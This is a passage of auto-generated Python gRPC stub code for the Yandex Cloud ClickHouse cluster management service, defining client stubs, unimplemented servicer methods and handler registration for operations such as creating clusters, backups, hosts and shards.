response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.Start = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/Start',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.StartClusterRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.Stop = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/Stop',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.StopClusterRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.Move = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/Move',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.MoveClusterRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.AddZookeeper = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/AddZookeeper',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.AddClusterZookeeperRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.Backup = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/Backup',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.BackupClusterRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.Restore = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/Restore',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.RestoreClusterRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.RescheduleMaintenance = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/RescheduleMaintenance',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.RescheduleMaintenanceRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.ListLogs = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/ListLogs',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterLogsRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterLogsResponse.FromString,
)
self.StreamLogs = channel.unary_stream(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/StreamLogs',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.StreamClusterLogsRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.StreamLogRecord.FromString,
)
self.ListOperations = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/ListOperations',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterOperationsRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterOperationsResponse.FromString,
)
self.ListBackups = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/ListBackups',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterBackupsRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterBackupsResponse.FromString,
)
self.ListHosts = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/ListHosts',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterHostsRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterHostsResponse.FromString,
)
self.AddHosts = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/AddHosts',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.AddClusterHostsRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.UpdateHosts = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/UpdateHosts',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.UpdateClusterHostsRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.DeleteHosts = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/DeleteHosts',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.DeleteClusterHostsRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.GetShard = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/GetShard',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.GetClusterShardRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__pb2.Shard.FromString,
)
self.ListShards = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/ListShards',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterShardsRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterShardsResponse.FromString,
)
self.AddShard = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/AddShard',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.AddClusterShardRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.UpdateShard = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/UpdateShard',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.UpdateClusterShardRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.DeleteShard = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/DeleteShard',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.DeleteClusterShardRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.GetShardGroup = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/GetShardGroup',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.GetClusterShardGroupRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__pb2.ShardGroup.FromString,
)
self.ListShardGroups = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/ListShardGroups',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterShardGroupsRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterShardGroupsResponse.FromString,
)
self.CreateShardGroup = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/CreateShardGroup',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.CreateClusterShardGroupRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.UpdateShardGroup = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/UpdateShardGroup',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.UpdateClusterShardGroupRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.DeleteShardGroup = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/DeleteShardGroup',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.DeleteClusterShardGroupRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.CreateExternalDictionary = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/CreateExternalDictionary',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.CreateClusterExternalDictionaryRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.DeleteExternalDictionary = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/DeleteExternalDictionary',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.DeleteClusterExternalDictionaryRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
class ClusterServiceServicer(object):
"""A set of methods for managing ClickHouse clusters.
"""
def Get(self, request, context):
"""Returns the specified ClickHouse cluster.
To get the list of available ClickHouse clusters, make a [List] request.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def List(self, request, context):
"""Retrieves a list of ClickHouse clusters that belong
to the specified folder.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Create(self, request, context):
"""Creates a ClickHouse cluster in the specified folder.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Update(self, request, context):
"""Updates the specified ClickHouse cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Delete(self, request, context):
"""Deletes the specified ClickHouse cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Start(self, request, context):
"""Starts the specified ClickHouse cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Stop(self, request, context):
"""Stops the specified ClickHouse cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Move(self, request, context):
"""Moves a ClickHouse cluster to the specified folder.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def AddZookeeper(self, request, context):
"""Adds a ZooKeeper subcluster to the specified ClickHouse cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Backup(self, request, context):
"""Creates a backup for the specified ClickHouse cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Restore(self, request, context):
"""Creates a new ClickHouse cluster using the specified backup.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def RescheduleMaintenance(self, request, context):
"""Reschedules planned maintenance operation.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListLogs(self, request, context):
"""Retrieves logs for the specified ClickHouse cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def StreamLogs(self, request, context):
"""Same as ListLogs but using server-side streaming. Also allows for `tail -f` semantics.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListOperations(self, request, context):
"""Retrieves the list of Operation resources for the specified cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListBackups(self, request, context):
"""Retrieves the list of available backups for the specified ClickHouse cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListHosts(self, request, context):
"""Retrieves a list of hosts for the specified cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def AddHosts(self, request, context):
"""Creates new hosts for a cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateHosts(self, request, context):
"""Updates the specified hosts.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteHosts(self, request, context):
"""Deletes the specified hosts for a cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetShard(self, request, context):
"""Returns the specified shard.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListShards(self, request, context):
"""Retrieves a list of shards that belong to the specified cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def AddShard(self, request, context):
"""Creates a new shard in the specified cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateShard(self, request, context):
"""Modifies the specified shard.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteShard(self, request, context):
"""Deletes the specified shard.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetShardGroup(self, request, context):
"""Returns the specified shard group.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListShardGroups(self, request, context):
"""Retrieves a list of shard groups that belong to specified cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CreateShardGroup(self, request, context):
"""Creates a new shard group in the specified cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateShardGroup(self, request, context):
"""Updates the specified shard group.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteShardGroup(self, request, context):
"""Deletes the specified shard group.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CreateExternalDictionary(self, request, context):
"""Creates an external dictionary for the specified ClickHouse cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteExternalDictionary(self, request, context):
"""Deletes the specified external dictionary.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_ClusterServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'Get': grpc.unary_unary_rpc_method_handler(
servicer.Get,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.GetClusterRequest.FromString,
response_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__pb2.Cluster.SerializeToString,
),
'List': grpc.unary_unary_rpc_method_handler(
servicer.List,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClustersRequest.FromString,
response_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClustersResponse.SerializeToString,
),
'Create': grpc.unary_unary_rpc_method_handler(
servicer.Create,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.CreateClusterRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'Update': grpc.unary_unary_rpc_method_handler(
servicer.Update,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.UpdateClusterRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'Delete': grpc.unary_unary_rpc_method_handler(
servicer.Delete,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.DeleteClusterRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'Start': grpc.unary_unary_rpc_method_handler(
servicer.Start,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.StartClusterRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'Stop': grpc.unary_unary_rpc_method_handler(
servicer.Stop,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.StopClusterRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'Move': grpc.unary_unary_rpc_method_handler(
servicer.Move,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.MoveClusterRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'AddZookeeper': grpc.unary_unary_rpc_method_handler(
servicer.AddZookeeper,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.AddClusterZookeeperRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'Backup': grpc.unary_unary_rpc_method_handler(
servicer.Backup,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.BackupClusterRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'Restore': grpc.unary_unary_rpc_method_handler(
servicer.Restore,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.RestoreClusterRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'RescheduleMaintenance': grpc.unary_unary_rpc_method_handler(
servicer.RescheduleMaintenance,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.RescheduleMaintenanceRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'ListLogs': grpc.unary_unary_rpc_method_handler(
servicer.ListLogs,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterLogsRequest.FromString,
response_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterLogsResponse.SerializeToString,
),
'StreamLogs': grpc.unary_stream_rpc_method_handler(
servicer.StreamLogs,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.StreamClusterLogsRequest.FromString,
response_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.StreamLogRecord.SerializeToString,
),
'ListOperations': grpc.unary_unary_rpc_method_handler(
servicer.ListOperations,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterOperationsRequest.FromString,
response_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterOperationsResponse.SerializeToString,
),
'ListBackups': grpc.unary_unary_rpc_method_handler(
servicer.ListBackups,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterBackupsRequest.FromString,
response_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterBackupsResponse.SerializeToString,
),
'ListHosts': grpc.unary_unary_rpc_method_handler(
servicer.ListHosts,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterHostsRequest.FromString,
response_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterHostsResponse.SerializeToString,
),
'AddHosts': grpc.unary_unary_rpc_method_handler(
servicer.AddHosts,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.AddClusterHostsRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'UpdateHosts': grpc.unary_unary_rpc_method_handler(
servicer.UpdateHosts,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.UpdateClusterHostsRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'DeleteHosts': grpc.unary_unary_rpc_method_handler(
servicer.DeleteHosts,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.DeleteClusterHostsRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'GetShard': grpc.unary_unary_rpc_method_handler(
servicer.GetShard,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.GetClusterShardRequest.FromString,
response_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__pb2.Shard.SerializeToString,
),
'ListShards': grpc.unary_unary_rpc_method_handler(
servicer.ListShards,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterShardsRequest.FromString,
response_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterShardsResponse.SerializeToString,
),
'AddShard': grpc.unary_unary_rpc_method_handler(
servicer.AddShard,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.AddClusterShardRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'UpdateShard': grpc.unary_unary_rpc_method_handler(
servicer.UpdateShard,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.UpdateClusterShardRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'DeleteShard': grpc.unary_unary_rpc_method_handler(
servicer.DeleteShard,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.DeleteClusterShardRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'GetShardGroup': grpc.unary_unary_rpc_method_handler(
servicer.GetShardGroup,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.GetClusterShardGroupRequest.FromString,
response_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__pb2.ShardGroup.SerializeToString,
),
'ListShardGroups': grpc.unary_unary_rpc_method_handler(
servicer.ListShardGroups,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterShardGroupsRequest.FromString,
response_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterShardGroupsResponse.SerializeToString,
),
'CreateShardGroup': grpc.unary_unary_rpc_method_handler(
servicer.CreateShardGroup,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.CreateClusterShardGroupRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'UpdateShardGroup': grpc.unary_unary_rpc_method_handler(
servicer.UpdateShardGroup,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.UpdateClusterShardGroupRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'DeleteShardGroup': grpc.unary_unary_rpc_method_handler(
servicer.DeleteShardGroup,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.DeleteClusterShardGroupRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'CreateExternalDictionary': grpc.unary_unary_rpc_method_handler(
servicer.CreateExternalDictionary,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.CreateClusterExternalDictionaryRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'DeleteExternalDictionary': grpc.unary_unary_rpc_method_handler(
servicer.DeleteExternalDictionary,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.DeleteClusterExternalDictionaryRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'yandex.cloud.mdb.clickhouse.v1.ClusterService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class ClusterService(object):
"""A set of methods for managing ClickHouse clusters.
"""
@staticmethod
def Get(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/Get',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.GetClusterRequest.SerializeToString,
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__pb2.Cluster.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def List(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/List',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClustersRequest.SerializeToString,
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClustersResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Create(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/Create',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.CreateClusterRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Update(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/Update',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.UpdateClusterRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Delete(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/Delete',
